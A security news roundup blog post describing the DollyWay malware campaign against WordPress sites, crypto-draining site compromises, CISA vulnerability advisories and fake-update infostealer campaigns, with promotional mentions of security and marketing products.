Malware Operation ‘DollyWay’ Hacked 20,000+ WordPress Sites Globally

Ankit Agarwal
Ankit Agarwal

Growth Hacker

 
March 20, 2025 4 min read

Image courtesy of Malware Operation ‘DollyWay’ DollyWay is a long-running malware campaign that has compromised over 20,000 WordPress sites globally. The operation primarily targets WordPress sites, using a sophisticated approach to maintain control and inject malware. The malware redirects visitors to scam pages via traffic broker networks. The campaign is linked to VexTrio, a notable cybercriminal affiliate network that uses DNS techniques and domain generation algorithms. Initially, DollyWay included payloads such as ransomware and banking trojans, but it now focuses on redirects. Researchers at GoDaddy identified the malware’s mechanisms, which include cryptographic verification of data transfers and automated reinfection processes. DollyWay updates WordPress and removes competing malware to retain control over infected sites, highlighting the need for continuous security monitoring to protect WordPress sites.

DollyWay’s Infrastructure

DollyWay v3 operates through a distributed network of command and control (C2) and traffic direction system (TDS) nodes. It uses compromised WordPress sites to inject redirect scripts through files like wp-content/counts.php. The malware updates its node list daily to ensure effectiveness, even if some nodes are taken down. The injection pattern for the malware includes a unique hexadecimal string designed to evade detection. DollyWay also maintains persistence by disabling security plugins and reinstalling itself every time a page is loaded. Analysts noted that the reinfection process randomizes code to avoid detection, making removal challenging without taking the site offline. DollyWay injects backdoors into infected sites, permitting arbitrary PHP code execution while verifying data integrity through cryptographic signatures. Such advanced techniques showcase the evolving nature of the campaign, which has adapted over nearly a decade to remain effective against evolving security practices.

Over 2,000 Hacked WordPress Websites Infected with Crypto-Draining Malware

Threat actors have compromised over 2,000 WordPress websites, transforming them into crypto-draining portals. Affected websites now promote rogue NFT deals, enticing unsuspecting visitors to connect their wallets. The attacks are fueled by compromised sites that push crypto-draining malware through platforms like YouTube and malvertising. These attacks evolved from initial brute-forcing attempts to weaponizing visitors' web browsers, turning them into brute-forcing tools for probing admin passwords at other websites. The attackers revamped the compromised websites to include fake NFT discounts and enticing crypto offers, furthering their malicious agenda. Once the malicious code is executed, it generates fake pop-ups that trick users into linking their crypto wallets. If the user falls for the scam, their accounts will be drained of funds and NFTs, which will be redirected to attacker-controlled wallets. To protect against such threats, specialized software like Bitdefender Ultimate Security can shield users from phishing attempts and scam-ridden websites. Additionally, understanding crypto scams can significantly enhance users' ability to recognize and avoid these threats.

Cybersecurity Vulnerabilities and Exploits

The Cybersecurity and Infrastructure Security Agency (CISA) has warned about multiple vulnerabilities, including a critical vulnerability in SAP NetWeaver and Edimax IP cameras being exploited in attacks. Organizations are urged to address these vulnerabilities promptly to mitigate risks. In addition, a new ransomware-as-a-service (RaaS) operation called 'Dragon' has emerged, showcasing advanced initial access and exploitation methods. CISA has released advisories for several vulnerabilities, including those affecting NAKIVO Backup and Replication solutions, which have been actively exploited. With tax season approaching, scammers are intensifying their efforts to exploit unsuspecting taxpayers. Organizations must remain vigilant and implement security measures to counter these ongoing threats.

Hacked WordPress Sites Pushing Malware

Hackers are exploiting outdated versions of WordPress and plugins to distribute malware targeting both Windows and Mac users. This widespread campaign has affected over 10,000 websites. The hackers alter website content to display deceptive messages that prompt visitors to download malicious files masquerading as legitimate updates. The malware types involved include Amos, which targets macOS users, and SocGholish, which targets Windows users. These infostealers are designed to capture sensitive data, including passwords and crypto wallets. Cybersecurity experts recommend only downloading software from trusted sources and keeping systems updated to mitigate risks. The popularity of password-stealing malware has been highlighted by significant data breaches, emphasizing the need for continuous security vigilance. Organizations can benefit from services like GrackerAI, which transforms security news into strategic marketing content, enabling proactive communication about emerging threats and vulnerabilities. For advanced solutions in cybersecurity monitoring and to stay informed about the latest threats, explore GrackerAI’s offerings at GrackerAI.

Latest Cybersecurity Trends & Breaking News

Colossal Ransomware Attack Affects Hundreds of U.S. Companies PayPal Scam Alert: New Invoice Scheme Bypasses Email Security

Ankit Agarwal
Ankit Agarwal

Growth Hacker

 

Growth strategist who cracked the code on 18% conversion rates from SEO portals versus 0.5% from traditional content. Specializes in turning cybersecurity companies into organic traffic magnets through data-driven portal optimization.

Related Articles

The Question Hub Strategy: How B2B SaaS Companies Capture AI Search Traffic

Learn how B2B SaaS companies use Question Hub strategy to capture ChatGPT, Claude & Perplexity traffic. 5-step process with real case studies & results.

By Deepak Gupta July 23, 2025 3 min read
Read full article

Google Adds Comparison Mode for Real-Time SEO Checks

Use Google’s new Search Console comparison mode for hourly SEO audits. Perfect for SaaS & cybersecurity marketers tracking real-time changes.

By Ankit Agarwal July 18, 2025 3 min read
Read full article

2025 Programmatic SEO Playbook: AI, Real-Time Data, and Market Domination

Master 2025 programmatic SEO with AI-powered content, real-time data integration, and dynamic optimization. Includes implementation guide and competitive advantages.

By Deepak Gupta July 6, 2025 10 min read
Read full article

Quality at Scale: How AI Solves Programmatic SEO's Biggest Challenge

Discover how AI transforms thin programmatic content into high-quality pages that survive Google's 2025 updates. Includes quality metrics and implementation guide.

By Deepak Gupta July 6, 2025 13 min read
Read full article